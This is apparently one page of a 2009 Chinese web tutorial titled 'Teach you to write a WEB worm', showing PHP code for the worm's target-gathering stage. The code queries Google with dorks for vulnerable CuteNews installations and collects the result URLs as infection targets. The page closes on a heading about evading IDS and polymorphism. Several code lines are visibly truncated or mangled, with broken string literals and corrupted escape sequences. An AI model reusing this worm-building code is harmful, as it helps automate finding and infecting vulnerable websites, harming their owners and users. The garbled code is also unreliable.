WEB开发网
开发学院网络安全黑客技术 教你编写WEB蠕虫 阅读

教你编写WEB蠕虫

 2009-06-12 16:54:59 来源:WEB开发网   
核心提示: function gather_targets() {return array("http://localhost/cutenews");}基于web蠕虫的意图,通过搜索引擎去寻找潜在的目标是很有必要的,教你编写WEB蠕虫(4),你可以很容易地写出一些请求,并通过URL

  function gather_targets() {
  return array("http://localhost/cutenews");
  }

基于web蠕虫的意图,通过搜索引擎去寻找潜在的目标是很有必要的。你可以很容易地写出一些请求,并通过URLs让网站执行特定软件。这可以通过网页收集代码来产生一组包含可被worm感染的目标数组,以此实现其自动化。

  $search = array("inurl:flood.db.php", ""powered by cutenews v1.3"",
  ""/cutenews/remote_headlines.php"", ""powered by CuteNews" "2003..2005
  CutePHP"", "inurl:"/newsarchive.php?archive"");
  $query = $search[rand(0, count($search)-1)];

通过构造HTTP requests,你就可以从搜索引擎中获得搜索结果,然后从返回的网址中寻找合适的目标。

  $fp = fsockopen("google.com", "80");
  fwrite($fp, "GET /search?q=" . urlencode($query) .
  "&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls
  =org.mozilla:en-US:official HTTP/1.1rn
  Host: www.google.comrn
  User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)
  Gecko/20050511/1.0.4rn
  Accept:
  text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
  image/png,*/*;q=0.5rn
  Accept-Language: en-us,en;q=0.5rn
  Accept-Encoding: gzip,deflatern
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn
  Connection: closernrn");
  while (!feof($fp) AND (strpos($text, "2005 Google") === false)) {
  $text.= fgets($fp);
  }
  fclose($fp);
  while (!(strpos($text, "
  $starttext = substr($text, strpos($text, "
  $thenumber = substr($starttext, 0, strpos($starttext, """));
  $text = str_replace("", "x", $text);
  if (strpos($thenumber, "google") === false) $vuln[] = $thenumber;
  }
  print_r($vuln);
  ===绕过IDS,多态性和通讯===

上一页  1 2 3 4 5  下一页

Tags:编写 WEB 蠕虫

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接